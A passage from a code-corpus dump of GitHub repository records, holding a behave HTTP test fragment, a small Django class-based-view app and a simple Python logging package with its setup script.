get_custom_logger()\n\n\n@when('A {method} request is sent to {url}')\ndef request_is_sent(context, method, url):\n payload = \"{\\n \\\"key1\\\": 1,\\n \\\"key2\\\": \\\"value2\\\"\\n}\"\n headers = {\n 'Content-Type': \"application/json,text/plain\",\n 'User-Agent': \"PostmanRuntime/7.15.0\",\n 'Accept': \"*/*\",\n 'Cache-Control': \"no-cache\",\n 'Postman-Token': \"e908a437-88ea-4b00-af53-7a9a49033830,ba90e008-0f7f-4576-beb8-b7739c8961f1\",\n 'Host': \"httpbin.org\",\n 'accept-encoding': \"gzip, deflate\",\n 'content-length': \"42\",\n 'Connection': \"keep-alive\",\n 'cache-control': \"no-cache\"\n }\n\n response = requests.request(method, url, data=payload, headers=headers)\n context.response = response\n log.info(pretty_request(response.request))\n\n\n@then('Response code is {code}')\ndef response_code_is(context, code):\n log.info(pretty_response(context.response))\n assert context.response.status_code == int(code)\n\n\n@then('Response message is {message}')\ndef response_message_is(context, message):\n response = context.response.json()\n log.info(\"Message is: \" + response[\"message\"])\n assert response[\"message\"] == message\n" } ]
2
endjack/cbv
https://github.com/endjack/cbv
f2159302e896cc0f7c2aa64f6d302e3bec5989fd
2e42fa2313bf3301d20ae2a530660820d1171dff
bedcf6fc9b742a78c01e44b62d763d1e521570ab
refs/heads/master
2023-05-07T20:57:11.122373
2021-06-02T00:03:22
2021-06-02T00:03:22
372,990,821
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6822916865348816, "alphanum_fraction": 0.6822916865348816, "avg_line_length": 22.875, "blob_id": "2d834d927cdb43c951ae42dfe7810374cc2605c7", "content_id": "85dfc33db0a67d620da721a1af6e3aeeba0ccd31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 192, "license_type": "no_license", "max_line_length": 48, "num_lines": 8, "path": "/core/urls.py", "repo_name": "endjack/cbv", "src_encoding": "UTF-8", "text": "\nfrom django.contrib import admin\nfrom django.urls import path\nfrom cbv.views import *\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', IndexView.as_view(), name=\"index\"),\n]\n" }, { "alpha_fraction": 0.7552083134651184, "alphanum_fraction": 0.7708333134651184, "avg_line_length": 18.299999237060547, "blob_id": "bd6a82b752d39f80d361c9adad69687165c17ae4", "content_id": "f6b4bf9890068ef19d3d606e953d7e001cf2ed72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 192, "license_type": "no_license", "max_line_length": 43, "num_lines": 10, "path": "/cbv/models.py", "repo_name": "endjack/cbv", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib import admin\n\n# Create your models here.\n\nclass Pessoa(models.Model):\n nome = models.CharField(max_length=200)\n\n\nadmin.site.register(Pessoa)" }, { "alpha_fraction": 0.720893144607544, "alphanum_fraction": 0.720893144607544, "avg_line_length": 30.149999618530273, "blob_id": "384035c583e87b3ea803c0e697a1e1249b8f402b", "content_id": "104a9da9b429063c296cf1ccd902ac837f9e6fde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 627, "license_type": "no_license", "max_line_length": 57, "num_lines": 20, "path": "/cbv/views.py", "repo_name": "endjack/cbv", "src_encoding": "UTF-8", "text": "from cbv.forms import PessoaForm\nfrom django.shortcuts import render\nfrom django.views.generic import TemplateView, View\nfrom django.urls import reverse_lazy\nfrom django.views.generic.edit import CreateView\nfrom .models import *\n\n# Create your views here.\n\n# CRIANDO E LISTANDO NA MESMA TEMPLATE\nclass IndexView(CreateView):\n template_name = 'index.html'\n model = Pessoa\n form_class = PessoaForm\n success_url = reverse_lazy('index')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"objects_pessoas\"] = Pessoa.objects.all()\n return context\n " }, { "alpha_fraction": 0.6740331649780273, "alphanum_fraction": 0.6740331649780273, "avg_line_length": 21.625, "blob_id": "c1baee5ffc4204045b9470c5718ce32131dcceff", "content_id": "4b593629103cf92847af1f01dc7646481d72048e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 181, "license_type": "no_license", "max_line_length": 34, "num_lines": 8, "path": "/cbv/forms.py", "repo_name": "endjack/cbv", "src_encoding": "UTF-8", "text": "from django import forms\nfrom django.forms import fields\nfrom .models import *\n\nclass PessoaForm(forms.ModelForm):\n class Meta:\n model = Pessoa\n fields = '__all__'\n" } ]
4
lilyinstarlight/log.py
https://github.com/lilyinstarlight/log.py
33a069321173a9e2c5ae95d18bc75ef1eb9c86f0
3e1ccf725f7aabb113037eb920fb504058105bcb
0e3eddba5ca89368f7dd1a790ee6baff60d38ac8
refs/heads/master
2021-06-06T06:30:35.083213
2016-07-22T03:04:40
2016-07-22T03:04:40
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6972476840019226, "alphanum_fraction": 0.6972476840019226, "avg_line_length": 35.33333206176758, "blob_id": "dc3b3d7f1437ce9a412ecaf7a4550f9ffaa90251", "content_id": "7a8c029d2e40a5a77a18e1e5e394dd8c17c93d94", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 109, "license_type": "permissive", "max_line_length": 94, "num_lines": 3, "path": "/README.md", "repo_name": "lilyinstarlight/log.py", "src_encoding": "UTF-8", "text": "log.py\n======\nlog.py is a logger for web applications that use [web.py](https://github.com/fkmclane/web.py).\n" }, { "alpha_fraction": 0.6594203114509583, "alphanum_fraction": 0.6594203114509583, "avg_line_length": 18.714284896850586, "blob_id": "698cb09bd94c9c05cec51bc3acf282740f7d5f6c", "content_id": "92ccd5bd893d15acdb56c470ddac2081afd2463d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 138, "license_type": "permissive", "max_line_length": 47, "num_lines": 7, "path": "/log/__init__.py", "repo_name": "lilyinstarlight/log.py", "src_encoding": "UTF-8", "text": "# module details\nfrom .log import name, version\n\n# classes\nfrom .log import Log, HTTPLog\n\n__all__ = ['name', 'version', 'Log', 'HTTPLog']\n" }, { "alpha_fraction": 0.5432692170143127, "alphanum_fraction": 0.549879789352417, "avg_line_length": 26.278688430786133, "blob_id": "b019cd743b031360dae88eb0c6b3372b742485b1", "content_id": "c0e762bb6a63568b0d91129b41e13053cfbfb3f0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1664, "license_type": "permissive", "max_line_length": 139, "num_lines": 61, "path": "/log/log.py", "repo_name": "lilyinstarlight/log.py", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport time\nimport traceback\n\n\nname = \"log.py\"\nversion = \"0.0a0\"\n\n\nclass Log(object):\n def __init__(self, log=None):\n if log:\n os.makedirs(os.path.dirname(log), exist_ok=True)\n self.log = open(log, 'a', 1)\n else:\n self.log = sys.stdout\n\n def timestamp(self):\n return time.strftime('[%d/%b/%Y:%H:%M:%S %z]')\n\n def write(self, string):\n if self.log:\n self.log.write(string)\n\n def message(self, message):\n self.write(self.timestamp() + ' ' + message + '\\n')\n\n def head(self, header):\n self.message(header)\n self.message('=' * len(header))\n\n def info(self, message):\n self.message('INFO: ' + message)\n\n def warning(self, message):\n self.message('WARNING: ' + message)\n\n def error(self, message):\n self.message('ERROR: ' + message)\n\n def exception(self, message='Caught Exception'):\n self.error(message + ':\\n\\t' + traceback.format_exc().replace('\\n', '\\n\\t'))\n\n\nclass HTTPLog(Log):\n def __init__(self, log=None, access_log=None):\n Log.__init__(self, log)\n\n if access_log:\n os.makedirs(os.path.dirname(access_log), exist_ok=True)\n self.access_log = open(access_log, 'a', 1)\n else:\n self.access_log = sys.stdout\n\n def access_write(self, string):\n if self.access_log:\n self.access_log.write(string)\n\n def request(self, host, request, code='-', size='-', rfc931='-', authuser='-'):\n self.access_write(host + ' ' + rfc931 + ' ' + authuser + ' ' + self.timestamp() + ' \"' + request + '\" ' + code + ' ' + size + '\\n')\n" }, { "alpha_fraction": 0.6539792418479919, "alphanum_fraction": 0.6574394702911377, "avg_line_length": 18.266666412353516, "blob_id": "1f321f33d4b2d282f83ba4d2c781aa2424aaa1c7", "content_id": "f68196a45e491fcf4e0b6393f0d31b70d72a5641", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 289, "license_type": "permissive", "max_line_length": 64, "num_lines": 15, "path": "/setup.py", "repo_name": "lilyinstarlight/log.py", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nfrom distutils.core import setup\n\nfrom log import name, version\n\n\nsetup(\n name=name,\n version=version,\n description='a logger for web applications that use web.py',\n license='MIT',\n author='Foster McLane',\n author_email='[email protected]',\n packages=['log'],\n)\n" } ]
4
msmenezesbr84/nutanix_Personal_mm
https://github.com/msmenezesbr84/nutanix_Personal_mm
543a1a8470ea414b113074b084445356aeee3d02
2e4223b3d9f802619dab2ac558471462a589b8c1
eea2c99c79e1e91e09d054e8578ef833ca288a59
refs/heads/master
2022-12-01T18:58:16.108308
2020-08-07T02:39:02
2020-08-07T02:39:02
285,717,969
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7692307829856873, "alphanum_fraction": 0.7854251265525818, "avg_line_length": 81.33333587646484, "blob_id": "0d55557598fdc563a61c1ce64cafdaa5b450f547", "content_id": "862eaa02272ab05060d0e3d8906665311bea5d6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 247, "license_type": "no_license", "max_line_length": 193, "num_lines": 3, "path": "/azuredevops-master/README.md", "repo_name": "msmenezesbr84/nutanix_Personal_mm", "src_encoding": "UTF-8", "text": "# CI/CD Demo with Nutanix Calm DSL and Azure DevOps\n\n[![Build Status](https://dev.azure.com/pipoe2h/Calm/_apis/build/status/pipoe2h.azuredevops?branchName=master)](https://dev.azure.com/pipoe2h/Calm/_build/latest?definitionId=1&branchName=master)\n" }, { "alpha_fraction": 0.7597765326499939, "alphanum_fraction": 0.7597765326499939, "avg_line_length": 35, "blob_id": "ed0d12d505d53b84bb248d857209d35080241fab", "content_id": "20cdd7fe83d35c4da2d3993acd4ef632ae8fbc4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 179, "license_type": "no_license", "max_line_length": 67, "num_lines": 5, "path": "/azuredevops-master/variablestemplate.py", "repo_name": "msmenezesbr84/nutanix_Personal_mm", "src_encoding": "UTF-8", "text": "from calm.dsl.builtins import CalmVariable as Variable\n\nENVIRONMENT = Variable.WithOptions.Predefined.string(\n [\"DEV\", \"PROD\"], default=\"DEV\", is_mandatory=True, runtime=True\n)" }, { "alpha_fraction": 0.5867260694503784, "alphanum_fraction": 0.5913350582122803, "avg_line_length": 37.744049072265625, "blob_id": "2ae344fa9fb6adf3176e2fd80d7cb44bbf0ca6d3", "content_id": "cbfd45f3c38297acb3e0026d56d8eccf02cafd9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6509, "license_type": "no_license", "max_line_length": 133, "num_lines": 168, "path": "/azuredevops-master/deprecated/calm.py", "repo_name": "msmenezesbr84/nutanix_Personal_mm", "src_encoding": "UTF-8", "text": "import urllib3\nimport json\nimport os\nfrom base64 import b64encode\nimport sys\nimport requests\nrequests.packages.urllib3.disable_warnings()\n\nimport ssl\n\ntry:\n _create_unverified_https_context = ssl._create_unverified_context\nexcept AttributeError:\n # Legacy Python that doesn't verify HTTPS certificates by default\n pass\nelse:\n # Handle target environment that doesn't support HTTPS verification\n ssl._create_default_https_context = _create_unverified_https_context\n\nclass PcManager():\n\n def __init__(self, ip_addr, username, password):\n # Initialise the options.\n self.ip_addr = ip_addr\n self.username = username\n self.password = password\n self.rest_params_init()\n\n # Initialize REST API parameters\n def rest_params_init(self, sub_url=\"\", method=\"\",\n body=None, content_type=\"application/json\", response_file=None):\n self.sub_url = sub_url\n self.body = body\n self.method = method\n self.content_type = content_type\n self.response_file = response_file\n\n # Create a REST client session.\n def rest_call(self): \n base_url = 'https://%s:9440/api/nutanix/v3/%s' % (\n self.ip_addr, self.sub_url)\n if self.body and self.content_type == \"application/json\":\n self.body = json.dumps(self.body)\n\n creds = '%s:%s' % (self.username, self.password)\n base64string = b64encode(creds.encode()).strip().decode()\n \n header = {\n 'Authorization': 'Basic %s' % base64string,\n 'Content-Type': '%s; charset=utf-8' % self.content_type\n }\n\n http = urllib3.PoolManager(headers=header)\n response = http.request(method=self.method, url=base_url, body=self.body)\n\n if response:\n response = json.loads(response.data.decode('UTF-8'))\n return response\n\n def search_blueprint(self, blueprint_name):\n body = {\n \"filter\": \"name==%s\" % blueprint_name,\n \"length\": 250,\n \"offset\": 0\n }\n self.rest_params_init(sub_url=\"blueprints/list\", method=\"POST\", body=body)\n return self.rest_call()\n \n def get_blueprint(self, blueprint_uuid):\n sub_url = 'blueprints/%s' % blueprint_uuid\n self.rest_params_init(sub_url=sub_url, method=\"GET\")\n return self.rest_call()\n\n def launch_blueprint(self, blueprint_uuid, blueprint_spec):\n sub_url = 'blueprints/%s/launch' % blueprint_uuid\n self.rest_params_init(sub_url=sub_url, method=\"POST\", body=blueprint_spec)\n return self.rest_call()\n\n def get_blueprint_uuid(self, blueprint_name):\n bp = self.search_blueprint(blueprint_name)\n bp_uuid = bp['entities'][0]['metadata']['uuid']\n return bp_uuid \n\nclass CalmAzureDevOps(object):\n\n ###########################################################################\n # Main execution path\n ###########################################################################\n\n def __init__(self):\n \"\"\"Main execution path \"\"\"\n\n # PrismCentralInventory data\n self.data = {} # All PrismCentral data\n\n # Read settings, environment variables, and CLI arguments\n self.read_environment()\n\n def read_environment(self):\n \"\"\" Reads the settings from environment variables \"\"\"\n # Setup PC IP\n if os.getenv(\"PC_IP\"):\n self.ip_addr = os.getenv(\"PC_IP\")\n # Setup credentials\n if os.getenv(\"PC_USERNAME\"):\n self.username = os.getenv(\"PC_USERNAME\")\n if os.getenv(\"PC_PASSWORD\"):\n self.password = os.getenv(\"PC_PASSWORD\")\n # Setup Calm\n if os.getenv(\"CALM_APPNAME\"):\n self.calm_appname = os.getenv(\"CALM_APPNAME\")\n if os.getenv(\"CALM_APPPROFILENAME\"):\n self.calm_appprofilename = os.getenv(\"CALM_APPPROFILENAME\")\n if os.getenv(\"CALM_BPNAME\"):\n self.calm_bpname = os.getenv(\"CALM_BPNAME\")\n if os.getenv(\"CALM_PRJNAME\"):\n self.calm_prjname = os.getenv(\"CALM_PRJNAME\")\n\n # Verify Prism Central IP was set\n if not hasattr(self, 'ip_addr'):\n msg = 'Could not find values for PrismCentral ip_addr. They must be specified via either ini file, ' \\\n 'command line argument (--ip-addr, -i), or environment variables (PC_IP_ADDR)\\n'\n sys.stderr.write(msg)\n sys.exit(-1)\n\n # Verify credentials were set\n if not hasattr(self, 'username'):\n msg = 'Could not find values for PrismCentral username. They must be specified via either ini file, ' \\\n 'command line argument (--username, -u), or environment variables (PC_USERNAME)\\n'\n sys.stderr.write(msg)\n sys.exit(-1)\n if not hasattr(self, 'password'):\n msg = 'Could not find values for PrismCentral password. They must be specified via either ini file, ' \\\n 'command line argument (--password, -p), or environment variables (PC_PASSWORD)\\n'\n sys.stderr.write(msg)\n sys.exit(-1)\n\n self.manager = PcManager(self.ip_addr, self.username, self.password)\n\n bp_uuid, bp_spec = self.build_blueprintSpec(self.calm_appname, self.calm_appprofilename, self.calm_bpname, self.calm_prjname)\n \n self.manager.launch_blueprint(bp_uuid, bp_spec)\n\n def build_blueprintSpec(self, calm_appname, calm_appprofilename, calm_bpname, calm_prjname): \n bp_uuid = self.manager.get_blueprint_uuid(calm_bpname)\n bp_spec = self.manager.get_blueprint(bp_uuid)\n bp_spec.pop('status')\n bp_spec['spec'].pop('name')\n bp_spec['spec']['application_name'] = calm_appname\n\n app_profile_uuid = None\n app_profile_list = bp_spec['spec']['resources']['app_profile_list']\n i = 0\n while i < len(app_profile_list):\n app_profile = app_profile_list[i]\n if app_profile['name'] == calm_appprofilename:\n app_profile_uuid = app_profile['uuid']\n break \n i += 1\n if app_profile_uuid == None:\n raise Exception(\"App profile with name \" + calm_appprofilename + \" not found in list\")\n app_profile_reference = {}\n app_profile_reference['kind'] = 'app_profile'\n app_profile_reference['uuid'] = app_profile_uuid\n bp_spec['spec']['app_profile_reference'] = app_profile_reference\n return bp_uuid, bp_spec\n\nCalmAzureDevOps()\n" }, { "alpha_fraction": 0.6246617436408997, "alphanum_fraction": 0.6312330961227417, "avg_line_length": 20.213115692138672, "blob_id": "3e3720c6a9517bbe1e2f0b6131c281c900d9be34", "content_id": "046c810d48191d5778e9b24199e32563bfab9ab2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2587, "license_type": "no_license", "max_line_length": 103, "num_lines": 122, "path": "/azuredevops-master/main.py", "repo_name": "msmenezesbr84/nutanix_Personal_mm", "src_encoding": "UTF-8", "text": "import os\nimport json\n\nfrom calm.dsl.builtins import Service, Package, Substrate\nfrom calm.dsl.builtins import Deployment, Profile, Blueprint\nfrom calm.dsl.builtins import action, ref, basic_cred, CalmTask\nfrom calm.dsl.builtins import read_local_file, read_ahv_spec, read_vmw_spec, read_file\nfrom calm.dsl.builtins import vm_disk_package\nfrom calm.dsl.builtins import read_env\n\nimport sys\nsys.path.append('')\n\nfrom variablestemplate import *\n\n# Import .env variables\nENV = read_env()\n\nAHV_CENTOS_76 = vm_disk_package(\n name=\"AHV_CENTOS_76\",\n config={\n # By default image type is set to DISK_IMAGE\n \"image\": {\n \"source\": ENV.get(\"CENTOS_IMAGE_SOURCE\")\n }\n },\n)\n\n# Credentials definition\nCREDENTIALS = read_env('.local/credentials')\n\nOS_USERNAME = os.getenv(\"OS_USERNAME\") or CREDENTIALS.get(\"OS_USERNAME\")\nOS_PASSWORD = os.getenv(\"OS_PASSWORD\") or CREDENTIALS.get(\"OS_PASSWORD\")\n\nCred_OS = basic_cred(\n username=OS_USERNAME,\n password=OS_PASSWORD,\n name=\"Cred_OS\",\n default=True,\n type=\"PASSWORD\"\n)\n\n\nclass CentOS(Service):\n \"\"\"CentOS for Launching Demo\"\"\"\n\n\nclass CentOS_Package(Package):\n \"\"\"CentOS Package\"\"\"\n\n services = [ref(CentOS)]\n\n\nclass CentOS_Substrate(Substrate):\n \"\"\"CentOS Substrate\"\"\"\n\n os_type = \"Linux\"\n\n provider_spec = read_ahv_spec(\n \"centos-spec.yaml\",\n disk_packages={1: AHV_CENTOS_76}\n )\n\n provider_spec.spec[\"name\"] = \"@@{calm_application_name}@@\"\n provider_spec.spec[\"resources\"][\"nic_list\"][0][\"subnet_reference\"][\"name\"] = ENV.get(\"SUBNET_NAME\")\n provider_spec.spec[\"resources\"][\"nic_list\"][0][\"subnet_reference\"][\"uuid\"] = ENV.get(\"SUBNET_UUID\")\n\n\n readiness_probe = {\n \"disabled\": False,\n \"delay_secs\": \"60\",\n \"connection_type\": \"SSH\",\n \"connection_port\": 22,\n \"credential\": ref(Cred_OS),\n }\n\n\nclass CentOS_Deployment(Deployment):\n \"\"\"CentOS Deployment\"\"\"\n\n min_replicas = \"1\"\n max_replicas = \"1\"\n\n packages = [ref(CentOS_Package)]\n substrate = ref(CentOS_Substrate)\n\n\nclass Default(Profile):\n \"\"\"CentOS Profile\"\"\"\n\n ENVIRONMENT = ENVIRONMENT\n\n deployments = [\n CentOS_Deployment\n ]\n\n\nclass CentOS_Blueprint(Blueprint):\n \"\"\"CentOS Blueprint\"\"\"\n\n credentials = [\n Cred_OS\n ]\n services = [\n CentOS\n ]\n packages = [\n CentOS_Package,\n AHV_CENTOS_76\n ]\n substrates = [\n CentOS_Substrate\n ]\n profiles = [Default]\n\n\ndef main():\n print(Workload_Mobility_Setup.json_dumps(pprint=True))\n\n\nif __name__ == \"__main__\":\n main()" } ]
4
wsv587/Data-Structure-and-Algorithms
https://github.com/wsv587/Data-Structure-and-Algorithms
d6f028874d925930b73eb856b5fd8359d4244920
c9eeccf3e5271cb053d74dcf5e552611ed19f632
4fb87c66f4ab6d04393919cc1b7e0f517577292d
refs/heads/master
2021-07-02T06:27:01.940337
2020-10-12T01:55:22
2020-10-12T01:55:22
181,307,893
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5500633716583252, "alphanum_fraction": 0.6463878154754639, "avg_line_length": 16.55555534362793, "blob_id": "a45ba08366fde2d757665422a287d0c4ee0fd3f3", "content_id": "df3f6adef3638508090bb318b9905c829ece0b17", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 871, "license_type": "permissive", "max_line_length": 67, "num_lines": 45, "path": "/Python/SwapTwoValue.py", "repo_name": "wsv587/Data-Structure-and-Algorithms", "src_encoding": "UTF-8", "text": "# 方式一 中间变量\ndef swap1(value1, value2):\n temp = value1\n value1 = value2\n value2 = temp\n return value1, value2\n\n\ntup = swap1(666, 999)\nprint(tup)\n\n\n# 方式二 python特有\ndef swap2(value1, value2):\n value1, value2 = value2, value1\n return value1, value2 # 返回元组,不需要加括号\n\n\nvalueA = 10\nvalueB = 20\ntup = swap2(valueA, valueB) # 元组\nprint(tup)\n\n\n# 方式三 数学算法\ndef swap3(value1, value2):\n value1 = value1 - value2\n value2 = value1 + value2 # value2 = (value1 - value2) + value2\n value1 = value2 - value1 # value1 = value1 - (value1 - value2)\n return value1, value2\n\n\ntup = swap3(1, 2)\nprint(tup)\n\n# 方式四 按位操作 异或\ndef swap4(value1, value2):\n value1 = value1 ^ value2\n value2 = value1 ^ value2\n value1 = value1 ^ value2\n\n return value1, value2\n\n\nprint(swap4(111, 222))" }, { "alpha_fraction": 0.47708702087402344, "alphanum_fraction": 0.4884546995162964, "avg_line_length": 21.309524536132812, "blob_id": "5c9d6c89bf75f0bd938ddd54ec99fee71dd67992", "content_id": "30779bfd6b110628a203dc0e2288fcd89e7c566a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2815, "license_type": "permissive", "max_line_length": 47, "num_lines": 126, "path": "/Python/List/LinkList.py", "repo_name": "wsv587/Data-Structure-and-Algorithms", "src_encoding": "UTF-8", "text": "class Node:\n __slots__ = ['data', 'next']\n\n def __init__(self):\n self.data = None\n self.next = None\n\n def __init__(self, data, next):\n self.data = data\n self.next = next\n\n\nclass LinkList:\n __slots__ = ['first', 'last', '__size']\n\n def __init__(self):\n self.first = None\n self.last = None\n self.__size = 0\n\n def add(self, obj):\n if self.__size == 0:\n self.first = Node(obj, self.first)\n else:\n prev = self.__node(self.__size - 1)\n prev.next = Node(obj, None)\n self.__size += 1\n\n def insert(self, obj, idx):\n if idx == 0:\n self.first = Node(obj, self.first)\n else:\n prev = self.__node(idx - 1)\n prev.next = Node(obj, prev.next)\n self.__size += 1\n\n def remove_at_index(self, idx):\n if idx == 0:\n self.first = self.first.next\n else:\n prev = self.__node(idx - 1)\n prev.next = prev.next.next\n self.__size -= 1\n\n def remove(self, obj):\n prev = self.__prev_node_of(obj)\n prev.next = prev.next.next\n self.__size -= 1\n\n def pop(self):\n prev = self.__node(self.__size - 1)\n prev.next = prev.next.next\n self.__size -= 1\n\n def object_at_index(self, idx):\n node = self.__node(idx)\n return node.data\n\n def index_of(self, obj):\n node = self.__node_of(obj)\n return node.data\n\n def contains(self, obj):\n node = self.first\n for _ in range(0, self.__size - 1):\n if node.data is obj:\n return True\n node = node.next\n return False\n\n def is_empty(self):\n return self.__size == 0\n\n def clear(self):\n self.first = None\n self.__size = 0\n\n def size(self):\n return self.__size\n\n def __node(self, idx):\n node = self.first\n for i in range(0, idx):\n node = node.next\n return node\n\n def __node_of(self, obj):\n node = self.first\n\n for _ in range(0, self.__size - 1):\n if node.data is obj:\n return node\n node = node.next\n return None\n\n def __prev_node_of(self, obj):\n node = self.first\n prev = None\n for _ in range(0, self.__size - 1):\n if node.data is obj:\n return node\n prev = node\n node = node.next\n return prev\n\n @classmethod\n def link_list(cls):\n return cls()\n\n# list = LinkList()\n# list.__element = [2]\n#\n# print(list.__element)\n\n\nlist = LinkList.link_list()\nlist.add('1')\nlist.add('2')\nlist.add('3')\nprint(list.size())\nlist.insert('0', 1)\nprint(list.size())\nlist.insert('0', 0)\nprint(list.size())\nlist.insert('5', 5)\nprint(list.size())\n\n\n\n\n" }, { "alpha_fraction": 0.824999988079071, "alphanum_fraction": 0.824999988079071, "avg_line_length": 19, "blob_id": "12a3606b180dab10c1fd44f6624ae1a4c22c1ba8", "content_id": "05c1e8914db9603b61536cd45d69cc5c531d35f9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 54, "license_type": "permissive", "max_line_length": 31, "num_lines": 2, "path": "/README.md", "repo_name": "wsv587/Data-Structure-and-Algorithms", "src_encoding": "UTF-8", "text": "# Data-Structure-and-Algorithms\n数据结构和算法\n" }, { "alpha_fraction": 0.4519940912723541, "alphanum_fraction": 0.506646990776062, "avg_line_length": 12.816326141357422, "blob_id": "bf75a1c2bf198b0bc02638f4c40e12bd863f9fb6", "content_id": "65c16a8ebe9ad4451d9e959385a473f7adadbf88", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 777, "license_type": "permissive", "max_line_length": 43, "num_lines": 49, "path": "/Python/Fibonacci.py", "repo_name": "wsv587/Data-Structure-and-Algorithms", "src_encoding": "UTF-8", "text": "# 斐波那契数列\n# 0, 1, 1, 2, 3, 5, 8, 13, 21, 34 ...\n\n# 递归方式实现斐波那契数列\ndef fib(n):\n if n <= 1:\n return n\n return fib(n - 1) + fib(n - 2)\n\n\nresult = fib(8)\n\n\nprint(result)\n\n# for循环方式实现斐波那契数列\ndef fib1(n):\n if n <= 1:\n return n\n\n first = 0\n second = 1\n sum = 0\n for i in range(0, n - 1):\n sum = first + second\n first = second\n second = sum\n\n return sum\n\n\nresult = fib1(8)\nprint(result)\n\n\n# 数组方式实现斐波那契数列\ndef fib2(n):\n if n <= 1:\n return n\n\n arr = [0, 1]\n # range(min, max)不包括max, 所以此处是n+1\n for i in range(2, n+1):\n arr.append(arr[i - 1] + arr[i - 2])\n return max(arr)\n\n\nresult = fib2(8)\nprint(result)\n" }, { "alpha_fraction": 0.5484452247619629, "alphanum_fraction": 0.5669220089912415, "avg_line_length": 22.606382369995117, "blob_id": "f9d1a16698d71c8c616700846fccd934376fb108", "content_id": "88bf55568019e2e170e9cc577468b7bfaa3f3bac", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2535, "license_type": "permissive", "max_line_length": 84, "num_lines": 94, "path": "/Python/List/ArrayList.py", "repo_name": "wsv587/Data-Structure-and-Algorithms", "src_encoding": "UTF-8", "text": "import os\n\n\nclass ArrayList:\n ```创建一个arraylist对象```\n\n # size\n # defaultCount\n # elements\n # 对象方法、类方法、静态方法、对象属性、类属性前加两个下划线代表private私有\n\n __DEFAULT_COUNT = 10\n # 限制对象只可以动态增加这两个对象属性\n __slots__ = ['__elements', '__size'] # 对象属性前加两个下划线代表私有,外界不可访问\n\n def __init__(self):\n self.__elements = []\n self.__size = 0\n # print('init __size = %d'%(self.__size))\n\n # 类方法\n @classmethod\n def array_list(cls):\n return cls() # 也可以 return ArrayList()\n\n # 对象方法\n def add(self, obj):\n self.__elements.append(obj) # python 中不能使用list[idx] = xxx来添加元素,否则会报越界错误\n self.__size += 1\n print(self.__elements, self.__size)\n\n def remove_at_index(self, idx):\n for i in range(idx, self.__size - 1):\n print(i)\n self.__elements[idx] = self.__elements[idx + 1]\n del self.__elements[self.__size - 1] # 目前只想到这个方法,python貌似不支持设置为null\n # self.__elements[self.__size - 1] = None # 不能使用None,None也是对象\n self.__size -= 1\n print(self.__elements)\n\n def remove(self, obj):\n idx = self.index_of(obj) # 之所以不用contains方法,因为避免先调用contains、再调用index_of而消耗性能\n if idx == -1:\n return\n self.remove_at_index(idx)\n\n def pop(self):\n del self.__elements[self.__size - 1]\n # self.__elements[self.__size - 1] = None\n self.__size -= 1\n\n def object_at_index(self, idx):\n return self.__elements[idx]\n\n def index_of(self, obj):\n for i in range(0, self.__size):\n if self.__elements[i] == obj:\n return i\n return -1\n\n def contains(self, obj):\n return self.index_of(obj) != -1\n\n def is_empty(self):\n return self.__size == 0\n\n def clear(self):\n self.__elements = []\n\n def size(self):\n return self.__size\n\n\n# list = ArrayList()\n# list.add(12)\n# print(list.elements)\n# list.elements = [2, 4]\n# print(list.elements)\n\nlist = ArrayList.array_list()\n# list.__elements = [999]\n# print(list.__elements)\n\nlist.add(12)\nprint(list)\nlist.add(24)\nlist.remove_at_index(0)\nlist.add(666)\nlist.add(888)\n\nprint(list.index_of(666))\nprint(list.object_at_index(2))\nprint(list.contains(24))\nprint (list.is_empty())\n" } ]
5
UTA-HEP-Computing/DLTool
https://github.com/UTA-HEP-Computing/DLTool
90a6c92d14045efaf5bc449a3fb4c248677d53d4
b6510df248d068ca394be8242361bb1d154284bd
d35ed20f3c7c8323dd5066060a5f9f022fbc6e45
refs/heads/master
2020-06-16T10:03:02.709563
2016-11-30T00:30:08
2016-11-30T00:30:08
75,117,064
0
0
null
null
null
null
null
